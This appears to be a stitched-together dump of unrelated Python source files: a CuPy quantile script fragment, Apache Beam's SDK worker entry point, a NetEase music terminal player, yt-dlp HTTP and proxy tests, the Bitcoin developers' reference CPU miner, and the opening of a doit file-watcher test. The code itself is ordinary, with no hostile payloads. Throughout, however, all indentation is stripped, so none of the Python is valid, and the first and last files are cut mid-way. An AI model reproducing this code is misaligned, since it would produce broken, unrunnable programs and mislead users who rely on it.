# It appears theres a cupy bug when the 1st axis of the array passed to percentiles has size 1
xp.percentile(level_data_gpu, q=percentiles, axis=0, out=q_data_gpu)
else:
level_data_gpu = xp.zeros((adm_sizes[level], data_gpu.shape[1]), dtype=data_gpu.dtype)
xp.scatter_add(level_data_gpu, adm_array_map[level], data_gpu)
q_data_gpu = xp.empty((len(percentiles), adm_sizes[level]), dtype=level_data_gpu.dtype)
xp.percentile(level_data_gpu, q=percentiles, axis=1, out=q_data_gpu)
return q_data_gpu
try:
percentiles = xp.array(quantiles, dtype=np.float64) * 100.0
quantiles = np.array(quantiles)
for date_i, date in enumerate(tqdm.tqdm(dates)):
dataset = ds.dataset(data_dir, format="parquet", partitioning=["date"])
table = dataset.to_table(filter=ds.field("date") == "date=" + str(date_i))
table = table.drop(("date", "rid", "adm2_id")) # we don't need these b/c metadata
pop_weight_table = table.select(pop_weighted_cols)
table = table.drop(pop_weighted_cols)
w = np.ravel(np.broadcast_to(weights, (table.shape[0] // weights.shape[0], weights.shape[0])))
for i, col in enumerate(table.column_names):
if pat.is_float64(table.column(i).type):
typed_w = w.astype(np.float64)
else:
typed_w = w.astype(np.float32)
tmp = pac.multiply_checked(table.column(i), typed_w)
table = table.set_column(i, col, tmp)
for col in pop_weighted_cols:
if pat.is_float64(pop_weight_table[col].type):
typed_w = table["total_population"].to_numpy().astype(np.float64)
else:
typed_w = table["total_population"].to_numpy().astype(np.float32)
tmp = pac.multiply_checked(pop_weight_table[col], typed_w)
table = table.append_column(col, tmp)
for level in args.levels:
all_q_data = {}
for col in table.column_names: # TODO can we do all at once since we dropped date?
all_q_data[col] = pa_array_quantiles(table[col], level)
# all_q_data = {col: pa_array_quantiles(table[col]) for col in table.column_names}
# we could do this outside the date loop and cache for each adm level...
out_shape = (len(percentiles),) + adm_level_values[level].shape
all_q_data[level] = np.broadcast_to(adm_level_values[level], out_shape)
all_q_data["date"] = np.broadcast_to(date, out_shape)
all_q_data["quantile"] = np.broadcast_to(quantiles[..., None], out_shape)
for col in per_capita_cols:
all_q_data[col + "_per_100k"] = 100000.0 * all_q_data[col] / all_q_data["total_population"]
for col in pop_weighted_cols:
all_q_data[col] = all_q_data[col] / all_q_data["total_population"]
for col in all_q_data:
all_q_data[col] = xp.to_cpu(all_q_data[col].T.ravel())
write_queue.put((os.path.join(output_dir, level + "_quantiles.csv"), all_q_data))
del dataset
gc.collect()
except (KeyboardInterrupt, SystemExit):
logging.warning("Caught SIGINT, cleaning up")
write_queue.put(None) # send signal to term loop
write_thread.join() # join the write_thread
finally:
write_queue.put(None) # send signal to term loop
write_thread.join() # join the write_thread
if __name__ == "__main__":
# from line_profiler import LineProfiler
# lp = LineProfiler()
# lp_wrapper = lp(main)
# lp.add_function(main._process_date)
# lp_wrapper()
# lp.print_stats()
main()
|
sdk_worker_main.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK Fn Harness entry point."""
from __future__ import absolute_import
import http.server
import json
import logging
import os
import re
import sys
import threading
import traceback
from builtins import object
from google.protobuf import text_format
from apache_beam.internal import pickler
from apache_beam.options import pipeline_options
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.internal import names
from apache_beam.runners.worker.log_handler import FnApiLogRecordHandler
from apache_beam.runners.worker.sdk_worker import SdkHarness
from apache_beam.utils import profiler
# This module is experimental. No backwards-compatibility guarantees.
class StatusServer(object):
@classmethod
def get_thread_dump(cls):
lines = []
frames = sys._current_frames() # pylint: disable=protected-access
for t in threading.enumerate():
lines.append('--- Thread #%s name: %s ---\n' % (t.ident, t.name))
lines.append(''.join(traceback.format_stack(frames[t.ident])))
return lines
def start(self, status_http_port=0):
"""Executes the serving loop for the status server.
Args:
status_http_port(int): Binding port for the debug server.
Default is 0 which means any free unsecured port
"""
class StatusHttpHandler(http.server.BaseHTTPRequestHandler):
"""HTTP handler for serving stacktraces of all threads."""
def do_GET(self): # pylint: disable=invalid-name
"""Return all thread stacktraces information for GET request."""
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
for line in StatusServer.get_thread_dump():
self.wfile.write(line)
def log_message(self, f, *args):
"""Do not log any messages."""
pass
self.httpd = httpd = http.server.HTTPServer(
('localhost', status_http_port), StatusHttpHandler)
logging.info('Status HTTP server running at %s:%s', httpd.server_name,
httpd.server_port)
httpd.serve_forever()
def main(unused_argv):
"""Main entry point for SDK Fn Harness."""
if 'LOGGING_API_SERVICE_DESCRIPTOR' in os.environ:
logging_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
text_format.Merge(os.environ['LOGGING_API_SERVICE_DESCRIPTOR'],
logging_service_descriptor)
# Send all logs to the runner.
fn_log_handler = FnApiLogRecordHandler(logging_service_descriptor)
# TODO(BEAM-5468): This should be picked up from pipeline options.
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(fn_log_handler)
logging.info('Logging handler created.')
else:
fn_log_handler = None
# Start status HTTP server thread.
thread = threading.Thread(name='status_http_server',
target=StatusServer().start)
thread.daemon = True
thread.setName('status-server-demon')
thread.start()
if 'PIPELINE_OPTIONS' in os.environ:
sdk_pipeline_options = _parse_pipeline_options(
os.environ['PIPELINE_OPTIONS'])
else:
sdk_pipeline_options = PipelineOptions.from_dictionary({})
if 'SEMI_PERSISTENT_DIRECTORY' in os.environ:
semi_persistent_directory = os.environ['SEMI_PERSISTENT_DIRECTORY']
else:
semi_persistent_directory = None
logging.info('semi_persistent_directory: %s', semi_persistent_directory)
_worker_id = os.environ.get('WORKER_ID', None)
try:
_load_main_session(semi_persistent_directory)
except Exception: # pylint: disable=broad-except
exception_details = traceback.format_exc()
logging.error(
'Could not load main session: %s', exception_details, exc_info=True)
try:
logging.info('Python sdk harness started with pipeline_options: %s',
sdk_pipeline_options.get_all_options(drop_default=True))
service_descriptor = endpoints_pb2.ApiServiceDescriptor()
text_format.Merge(os.environ['CONTROL_API_SERVICE_DESCRIPTOR'],
service_descriptor)
# TODO(robertwb): Support credentials.
assert not service_descriptor.oauth2_client_credentials_grant.url
SdkHarness(
control_address=service_descriptor.url,
worker_count=_get_worker_count(sdk_pipeline_options),
worker_id=_worker_id,
profiler_factory=profiler.Profile.factory_from_options(
sdk_pipeline_options.view_as(pipeline_options.ProfilingOptions))
).run()
logging.info('Python sdk harness exiting.')
except: # pylint: disable=broad-except
logging.exception('Python sdk harness failed: ')
raise
finally:
if fn_log_handler:
fn_log_handler.close()
def _parse_pipeline_options(options_json):
options = json.loads(options_json)
# Check the options field first for backward compatibility.
if 'options' in options:
return PipelineOptions.from_dictionary(options.get('options'))
else:
# Remove extra urn part from the key.
portable_option_regex = r'^beam:option:(?P<key>.*):v1$'
return PipelineOptions.from_dictionary({
re.match(portable_option_regex, k).group('key')
if re.match(portable_option_regex, k) else k: v
for k, v in options.items()
})
def _get_worker_count(pipeline_options):
"""Extract worker count from the pipeline_options.
This defines how many SdkWorkers will be started in this Python process.
And each SdkWorker will have its own thread to process data. Name of the
experimental parameter is 'worker_threads'
Example Usage in the Command Line:
--experimental worker_threads=1
Note: worker_threads is an experimental flag and might not be available in
future releases.
Returns:
an int containing the worker_threads to use. Default is 12
"""
experiments = pipeline_options.view_as(DebugOptions).experiments
experiments = experiments if experiments else []
for experiment in experiments:
# There should only be 1 match so returning from the loop
if re.match(r'worker_threads=', experiment):
return int(
re.match(r'worker_threads=(?P<worker_threads>.*)',
experiment).group('worker_threads'))
return 12
def _load_main_session(semi_persistent_directory):
"""Loads a pickled main session from the path specified."""
if semi_persistent_directory:
session_file = os.path.join(semi_persistent_directory, 'staged',
names.PICKLED_MAIN_SESSION_FILE)
if os.path.isfile(session_file):
pickler.load_session(session_file)
else:
logging.warning(
'No session file found: %s. Functions defined in __main__ '
'(interactive session) may fail.', session_file)
else:
logging.warning(
'No semi_persistent_directory found: Functions defined in __main__ '
'(interactive session) may fail.')
if __name__ == '__main__':
main(sys.argv)
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: omi
# @Date: 2014-07-15 15:48:27
# @Last Modified by: omi
# @Last Modified time: 2015-01-30 18:05:08
'''
网易云音乐 Player
'''
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from builtins import str
from future import standard_library
standard_library.install_aliases()
# Let's make some noise
import subprocess
import threading
import time
import os
import random
import re
from .ui import Ui
from .storage import Storage
from .api import NetEase
from .cache import Cache
from .config import Config
from . import logger
log = logger.getLogger(__name__)
class Player(object):
def __init__(self):
self.config = Config()
self.ui = Ui()
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.pause_flag = False
self.process_length = 0
self.process_location = 0
self.process_first = False
self.storage = Storage()
self.info = self.storage.database['player_info']
self.songs = self.storage.database['songs']
self.playing_id = -1
self.playing_name = ''
self.cache = Cache()
self.notifier = self.config.get_item('notifier')
self.mpg123_parameters = self.config.get_item('mpg123_parameters')
self.end_callback = None
self.playing_song_changed_callback = None
def popen_recall(self, onExit, popenArgs):
'''
Runs the given args in subprocess.Popen, and then calls the function
onExit when the subprocess completes.
onExit is a callable object, and popenArgs is a lists/tuple of args
that would give to subprocess.Popen.
'''
def runInThread(onExit, arg):
para = ['mpg123', '-R']
para[1:1] = self.mpg123_parameters
self.popen_handler = subprocess.Popen(para,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.popen_handler.stdin.write(b'V ' + str(self.info['playing_volume']).encode('utf-8') + b'\n')
if arg:
self.popen_handler.stdin.write(b'L ' + arg.encode('utf-8') + b'\n')
else:
self.next_idx()
onExit()
return
self.popen_handler.stdin.flush()
self.process_first = True
while True:
if self.playing_flag is False:
break
strout = self.popen_handler.stdout.readline().decode('utf-8')
if re.match('^\@F.*$', strout):
process_data = strout.split(' ')
process_location = float(process_data[4])
if self.process_first:
self.process_length = process_location
self.process_first = False
self.process_location = 0
else:
self.process_location = self.process_length - process_location # NOQA
continue
elif strout[:2] == '@E':
# get a alternative url from new api
sid = popenArgs['song_id']
new_url = NetEase().songs_detail_new_api([sid])[0]['url']
if new_url is None:
log.warning(('Song {} is unavailable '
'due to copyright issue.').format(sid))
break
log.warning(
'Song {} is not compatible with old api.'.format(sid))
popenArgs['mp3_url'] = new_url
self.popen_handler.stdin.write(b'\nL ' + new_url.encode('utf-8') + b'\n')
self.popen_handler.stdin.flush()
self.popen_handler.stdout.readline()
elif strout == '@P 0\n':
self.popen_handler.stdin.write(b'Q\n')
self.popen_handler.stdin.flush()
self.popen_handler.kill()
break
if self.playing_flag:
self.next_idx()
onExit()
return
def getLyric():
if 'lyric' not in self.songs[str(self.playing_id)].keys():
self.songs[str(self.playing_id)]['lyric'] = []
if len(self.songs[str(self.playing_id)]['lyric']) > 0:
return
netease = NetEase()
lyric = netease.song_lyric(self.playing_id)
if lyric == [] or lyric == '未找到歌词':
return
lyric = lyric.split('\n')
self.songs[str(self.playing_id)]['lyric'] = lyric
return
def gettLyric():
if 'tlyric' not in self.songs[str(self.playing_id)].keys():
self.songs[str(self.playing_id)]['tlyric'] = []
if len(self.songs[str(self.playing_id)]['tlyric']) > 0:
return
netease = NetEase()
tlyric = netease.song_tlyric(self.playing_id)
if tlyric == [] or tlyric == '未找到歌词翻译':
return
tlyric = tlyric.split('\n')
self.songs[str(self.playing_id)]['tlyric'] = tlyric
return
def cacheSong(song_id, song_name, artist, song_url):
def cacheExit(song_id, path):
self.songs[str(song_id)]['cache'] = path
self.cache.add(song_id, song_name, artist, song_url, cacheExit)
self.cache.start_download()
if 'cache' in popenArgs.keys() and os.path.isfile(popenArgs['cache']):
thread = threading.Thread(target=runInThread,
args=(onExit, popenArgs['cache']))
else:
thread = threading.Thread(target=runInThread,
args=(onExit, popenArgs['mp3_url']))
cache_thread = threading.Thread(
target=cacheSong,
args=(popenArgs['song_id'], popenArgs['song_name'], popenArgs[
'artist'], popenArgs['mp3_url']))
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=getLyric, args=())
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(target=gettLyric, args=())
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def get_playing_id(self):
return self.playing_id
def get_playing_name(self):
return self.playing_name
def recall(self):
if self.info['idx'] >= len(self.info[
'player_list']) and self.end_callback is not None:
log.debug('Callback')
self.end_callback()
if self.info['idx'] < 0 or self.info['idx'] >= len(self.info[
'player_list']):
self.info['idx'] = 0
self.stop()
return
self.playing_flag = True
self.pause_flag = False
item = self.songs[self.info['player_list'][self.info['idx']]]
self.ui.build_playinfo(item['song_name'], item['artist'],
item['album_name'], item['quality'],
time.time())
if self.notifier:
self.ui.notify('Now playing', item['song_name'],
item['album_name'], item['artist'])
self.playing_id = item['song_id']
self.playing_name = item['song_name']
self.popen_recall(self.recall, item)
def generate_shuffle_playing_list(self):
del self.info['playing_list'][:]
for i in range(0, len(self.info['player_list'])):
self.info['playing_list'].append(i)
random.shuffle(self.info['playing_list'])
self.info['ridx'] = 0
def new_player_list(self, type, title, datalist, offset):
self.info['player_list_type'] = type
self.info['player_list_title'] = title
self.info['idx'] = offset
del self.info['player_list'][:]
del self.info['playing_list'][:]
self.info['ridx'] = 0
for song in datalist:
self.info['player_list'].append(str(song['song_id']))
if str(song['song_id']) not in self.songs.keys():
self.songs[str(song['song_id'])] = song
else:
database_song = self.songs[str(song['song_id'])]
if (database_song['song_name'] != song['song_name'] or
database_song['quality'] != song['quality']):
self.songs[str(song['song_id'])] = song
def append_songs(self, datalist):
for song in datalist:
self.info['player_list'].append(str(song['song_id']))
if str(song['song_id']) not in self.songs.keys():
self.songs[str(song['song_id'])] = song
else:
database_song = self.songs[str(song['song_id'])]
cond = any([database_song[k] != song[k]
for k in ('song_name', 'quality', 'mp3_url')])
if cond:
if 'cache' in self.songs[str(song['song_id'])].keys():
song['cache'] = self.songs[str(song['song_id'])][
'cache']
self.songs[str(song['song_id'])] = song
if len(datalist) > 0 and self.info['playing_mode'] == 3 or self.info[
'playing_mode'] == 4:
self.generate_shuffle_playing_list()
def play_and_pause(self, idx):
# if same playlists && idx --> same song :: pause/resume it
if self.info['idx'] == idx:
if self.pause_flag:
self.resume()
else:
self.pause()
else:
self.info['idx'] = idx
# if it's playing
if self.playing_flag:
self.switch()
# start new play
else:
self.recall()
# play another
def switch(self):
self.stop()
# wait process be killed
time.sleep(0.1)
self.recall()
def stop(self):
if self.playing_flag and self.popen_handler:
self.playing_flag = False
self.popen_handler.stdin.write(b'Q\n')
self.popen_handler.stdin.flush()
try:
self.popen_handler.kill()
except OSError as e:
log.error(e)
return
def pause(self):
if not self.playing_flag and not self.popen_handler:
return
self.pause_flag = True
self.popen_handler.stdin.write(b'P\n')
self.popen_handler.stdin.flush()
item = self.songs[self.info['player_list'][self.info['idx']]]
self.ui.build_playinfo(item['song_name'],
item['artist'],
item['album_name'],
item['quality'],
time.time(),
pause=True)
def resume(self):
self.pause_flag = False
self.popen_handler.stdin.write(b'P\n')
self.popen_handler.stdin.flush()
item = self.songs[self.info['player_list'][self.info['idx']]]
self.ui.build_playinfo(item['song_name'], item['artist'],
item['album_name'], item['quality'],
time.time())
self.playing_id = item['song_id']
self.playing_name = item['song_name']
def _swap_song(self):
plist = self.info['playing_list']
now_songs = plist.index(self.info['idx'])
plist[0], plist[now_songs] = plist[now_songs], plist[0]
def _is_idx_valid(self):
return 0 <= self.info['idx'] < len(self.info['player_list'])
def _inc_idx(self):
if self.info['idx'] < len(self.info['player_list']):
self.info['idx'] += 1
def _dec_idx(self):
if self.info['idx'] > 0:
self.info['idx'] -= 1
def _need_to_shuffle(self):
playing_list = self.info['playing_list']
ridx = self.info['ridx']
idx = self.info['idx']
if ridx >= len(playing_list) or playing_list[ridx] != idx:
return True
else:
return False
def next_idx(self):
if not self._is_idx_valid():
self.stop()
return
playlist_len = len(self.info['player_list'])
playinglist_len = len(self.info['playing_list'])
# Playing mode. 0 is ordered. 1 is orderde loop.
# 2 is single song loop. 3 is single random. 4 is random loop
if self.info['playing_mode'] == 0:
self._inc_idx()
elif self.info['playing_mode'] == 1:
self.info['idx'] = (self.info['idx'] + 1) % playlist_len
elif self.info['playing_mode'] == 2:
self.info['idx'] = self.info['idx']
elif self.info['playing_mode'] == 3 or self.info['playing_mode'] == 4:
if self._need_to_shuffle():
self.generate_shuffle_playing_list()
playinglist_len = len(self.info['playing_list'])
# When you regenerate playing list
# you should keep previous song same.
self._swap_song()
self.info['ridx'] += 1
# Out of border
if self.info['playing_mode'] == 4:
self.info['ridx'] %= playinglist_len
if self.info['ridx'] >= playinglist_len:
self.info['idx'] = playlist_len
else:
self.info['idx'] = self.info['playing_list'][self.info['ridx']]
else:
self.info['idx'] += 1
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
time.sleep(0.01)
self.next_idx()
self.recall()
def prev_idx(self):
if not self._is_idx_valid():
self.stop()
return
playlist_len = len(self.info['player_list'])
playinglist_len = len(self.info['playing_list'])
# Playing mode. 0 is ordered. 1 is orderde loop.
# 2 is single song loop. 3 is single random. 4 is random loop
if self.info['playing_mode'] == 0:
self._dec_idx()
elif self.info['playing_mode'] == 1:
self.info['idx'] = (self.info['idx'] - 1) % playlist_len
elif self.info['playing_mode'] == 2:
self.info['idx'] = self.info['idx']
elif self.info['playing_mode'] == 3 or self.info['playing_mode'] == 4:
if self._need_to_shuffle():
self.generate_shuffle_playing_list()
playinglist_len = len(self.info['playing_list'])
self.info['ridx'] -= 1
if self.info['ridx'] < 0:
if self.info['playing_mode'] == 3:
self.info['ridx'] = 0
else:
self.info['ridx'] %= playinglist_len
self.info['idx'] = self.info['playing_list'][self.info['ridx']]
else:
self.info['idx'] -= 1
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
time.sleep(0.01)
self.prev_idx()
self.recall()
def shuffle(self):
self.stop()
time.sleep(0.01)
self.info['playing_mode'] = 3
self.generate_shuffle_playing_list()
self.info['idx'] = self.info['playing_list'][self.info['ridx']]
self.recall()
def volume_up(self):
self.info['playing_volume'] = self.info['playing_volume'] + 7
if (self.info['playing_volume'] > 100):
self.info['playing_volume'] = 100
if not self.playing_flag:
return
self.popen_handler.stdin.write(b'V ' + str(self.info[
'playing_volume']).encode('utf-8') + b'\n')
self.popen_handler.stdin.flush()
def volume_down(self):
self.info['playing_volume'] = self.info['playing_volume'] - 7
if (self.info['playing_volume'] < 0):
self.info['playing_volume'] = 0
if not self.playing_flag:
return
self.popen_handler.stdin.write(b'V ' + str(self.info[
'playing_volume']).encode('utf-8') + b'\n')
self.popen_handler.stdin.flush()
def update_size(self):
self.ui.update_size()
if not 0 <= self.info['idx'] < len(self.info['player_list']):
if self.info['player_list']:
log.error('Index not in range!')
log.debug(self.info)
else:
item = self.songs[self.info['player_list'][self.info['idx']]]
if self.playing_flag:
self.ui.build_playinfo(item['song_name'], item['artist'],
item['album_name'], item['quality'],
time.time())
if self.pause_flag:
self.ui.build_playinfo(item['song_name'], item['artist'],
item['album_name'], item['quality'],
time.time(),
pause=True)
def cacheSong1time(self, song_id, song_name, artist, song_url):
def cacheExit(song_id, path):
self.songs[str(song_id)]['cache'] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, cacheExit)
self.cache.start_download()
|
test_http.py
|
#!/usr/bin/env python3
# Allow direct execution
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import ssl
import threading
from test.helper import http_server_port
from yt_dlp import YoutubeDL
from yt_dlp.compat import compat_http_server, compat_urllib_request
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
class HTTPTestRequestHandler(compat_http_server.BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def do_GET(self):
if self.path == '/video.html':
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(b'<html><video src="/vid.mp4" /></html>')
elif self.path == '/vid.mp4':
self.send_response(200)
self.send_header('Content-Type', 'video/mp4')
self.end_headers()
self.wfile.write(b'\x00\x00\x00\x00\x20\x66\x74[video]')
elif self.path == '/%E4%B8%AD%E6%96%87.html':
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(b'<html><video src="/vid.mp4" /></html>')
else:
assert False
class FakeLogger:
def debug(self, msg):
pass
def warning(self, msg):
pass
def error(self, msg):
pass
class TestHTTP(unittest.TestCase):
def setUp(self):
self.httpd = compat_http_server.HTTPServer(
('127.0.0.1', 0), HTTPTestRequestHandler)
self.port = http_server_port(self.httpd)
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
class TestHTTPS(unittest.TestCase):
def setUp(self):
certfn = os.path.join(TEST_DIR, 'testcert.pem')
self.httpd = compat_http_server.HTTPServer(
('127.0.0.1', 0), HTTPTestRequestHandler)
self.httpd.socket = ssl.wrap_socket(
self.httpd.socket, certfile=certfn, server_side=True)
self.port = http_server_port(self.httpd)
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def test_nocheckcertificate(self):
ydl = YoutubeDL({'logger': FakeLogger()})
self.assertRaises(
Exception,
ydl.extract_info, 'https://127.0.0.1:%d/video.html' % self.port)
ydl = YoutubeDL({'logger': FakeLogger(), 'nocheckcertificate': True})
r = ydl.extract_info('https://127.0.0.1:%d/video.html' % self.port)
self.assertEqual(r['entries'][0]['url'], 'https://127.0.0.1:%d/vid.mp4' % self.port)
def _build_proxy_handler(name):
class HTTPTestRequestHandler(compat_http_server.BaseHTTPRequestHandler):
proxy_name = name
def log_message(self, format, *args):
pass
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write('{self.proxy_name}: {self.path}'.format(self=self).encode('utf-8'))
return HTTPTestRequestHandler
class TestProxy(unittest.TestCase):
def setUp(self):
self.proxy = compat_http_server.HTTPServer(
('127.0.0.1', 0), _build_proxy_handler('normal'))
self.port = http_server_port(self.proxy)
self.proxy_thread = threading.Thread(target=self.proxy.serve_forever)
self.proxy_thread.daemon = True
self.proxy_thread.start()
self.geo_proxy = compat_http_server.HTTPServer(
('127.0.0.1', 0), _build_proxy_handler('geo'))
self.geo_port = http_server_port(self.geo_proxy)
self.geo_proxy_thread = threading.Thread(target=self.geo_proxy.serve_forever)
self.geo_proxy_thread.daemon = True
self.geo_proxy_thread.start()
def test_proxy(self):
geo_proxy = f'127.0.0.1:{self.geo_port}'
ydl = YoutubeDL({
'proxy': f'127.0.0.1:{self.port}',
'geo_verification_proxy': geo_proxy,
})
url = 'http://foo.com/bar'
response = ydl.urlopen(url).read().decode('utf-8')
self.assertEqual(response, f'normal: {url}')
req = compat_urllib_request.Request(url)
req.add_header('Ytdl-request-proxy', geo_proxy)
response = ydl.urlopen(req).read().decode('utf-8')
self.assertEqual(response, f'geo: {url}')
def test_proxy_with_idn(self):
ydl = YoutubeDL({
'proxy': f'127.0.0.1:{self.port}',
})
url = 'http://中文.tw/'
response = ydl.urlopen(url).read().decode('utf-8')
# b'xn--fiq228c' is '中文'.encode('idna')
self.assertEqual(response, 'normal: http://xn--fiq228c.tw/')
if __name__ == '__main__':
unittest.main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 25562
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_filewatch.py
|
import os
import time
import threading
import pytest
from doit.filewatch import FileModifyWatcher
class TestFileWatcher(object):
def testInit(self, restore_cwd, tmpdir):
dir1 = 'data3'
files = ('data/w1.txt', 'data/w2.txt')
